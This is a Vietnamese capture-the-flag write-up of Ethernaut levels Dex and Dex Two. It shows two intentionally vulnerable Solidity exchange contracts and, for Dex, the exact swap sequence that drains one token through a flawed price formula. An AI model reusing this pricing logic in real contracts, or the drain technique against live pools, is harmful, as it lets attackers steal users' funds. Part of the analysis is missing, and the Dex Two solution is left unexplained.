Skip to content

The Ethernaut writeups: 22 - Dex và 23 - Dex Two

Posted on:February 28, 2022

22. DEX

Nhiệm vụ: Ta được cho ban đầu 10 token1 và 10 token2. Trong contract có 100 token1 và 100 token2. Nhiệm vụ của ta là rút hết 1 trong 2 token trong dex.

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import '@openzeppelin/contracts/math/SafeMath.sol';

contract Dex {
 using SafeMath for uint;
 address public token1;
 address public token2;
 constructor(address _token1, address _token2) public {
  token1 = _token1;
  token2 = _token2;
 }

 function swap(address from, address to, uint amount) public {
  require((from == token1 && to == token2) || (from == token2 && to == token1), "Invalid tokens");
  require(IERC20(from).balanceOf(msg.sender) >= amount, "Not enough to swap");
  uint swap_amount = get_swap_price(from, to, amount);
  IERC20(from).transferFrom(msg.sender, address(this), amount);
  IERC20(to).approve(address(this), swap_amount);
  IERC20(to).transferFrom(address(this), msg.sender, swap_amount);
 }

 function add_liquidity(address token_address, uint amount) public{
  IERC20(token_address).transferFrom(msg.sender, address(this), amount);
 }

 function get_swap_price(address from, address to, uint amount) public view returns(uint){
  return((amount * IERC20(to).balanceOf(address(this)))/IERC20(from).balanceOf(address(this)));
 }

 function approve(address spender, uint amount) public {
  SwappableToken(token1).approve(spender, amount);
  SwappableToken(token2).approve(spender, amount);
 }

 function balanceOf(address token, address account) public view returns (uint){
  return IERC20(token).balanceOf(account);
 }
}

contract SwappableToken is ERC20 {
 constructor(string memory name, string memory symbol, uint initialSupply) public ERC20(name, symbol) {
    _mint(msg.sender, initialSupply);
 }
}

Phân tích

Ta nhận thấy có một sự phi lý trong logic swap của DEX này tại đây:

function get_swap_price(address from, address to, uint amount) public view returns(uint) {
 return((amount * IERC20(to).balanceOf(address(this)))/IERC20(from).balanceOf(address(this)));
}

Thật vậy:

cứ tiếp tục lần sau ta lại được nhiều hơn lần trước, rồi cuối cùng là rút hết tiền của một bên token là xong.

Solution

Thực hiện swap qua lại là xong:

await contract.swap(token1, token2, 10);
await contract.swap(token2, token1, 20);
await contract.swap(token1, token2, 24);
await contract.swap(token2, token1, 30);
await contract.swap(token1, token2, 41);
await contract.swap(token2, token1, 45);

Kiểm tra lại balance của contract:

(await contract.balanceOf(token2, instance)).toString();
> '0'

completed

23. DEX Two

Nhiệm vụ: Ta được cho ban đầu 10 token1 và 10 token2. Trong contract có 100 token1 và 100 token2. Nhiệm vụ của ta là rút hết toàn bộ token1 và token2 trong dex.

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import '@openzeppelin/contracts/math/SafeMath.sol';

contract DexTwo {
 using SafeMath for uint;
 address public token1;
 address public token2;
 constructor(address _token1, address _token2) public {
  token1 = _token1;
  token2 = _token2;
 }

 function swap(address from, address to, uint amount) public {
  require(IERC20(from).balanceOf(msg.sender) >= amount, "Not enough to swap");
  uint swap_amount = get_swap_amount(from, to, amount);
  IERC20(from).transferFrom(msg.sender, address(this), amount);
  IERC20(to).approve(address(this), swap_amount);
  IERC20(to).transferFrom(address(this), msg.sender, swap_amount);
 }

 function add_liquidity(address token_address, uint amount) public{
  IERC20(token_address).transferFrom(msg.sender, address(this), amount);
 }

 function get_swap_amount(address from, address to, uint amount) public view returns(uint){
  return((amount * IERC20(to).balanceOf(address(this)))/IERC20(from).balanceOf(address(this)));
 }

 function approve(address spender, uint amount) public {
  SwappableTokenTwo(token1).approve(spender, amount);
  SwappableTokenTwo(token2).approve(spender, amount);
 }

 function balanceOf(address token, address account) public view returns (uint){
  return IERC20(token).balanceOf(account);
 }
}

contract SwappableTokenTwo is ERC20 {
 constructor(string memory name, string memory symbol, uint initialSupply) public ERC20(name, symbol) {
    _mint(msg.sender, initialSupply);
 }
}

Phân tích

Solution

Bạn đọc tự làm, hoàn toàn giống với DEX.

completed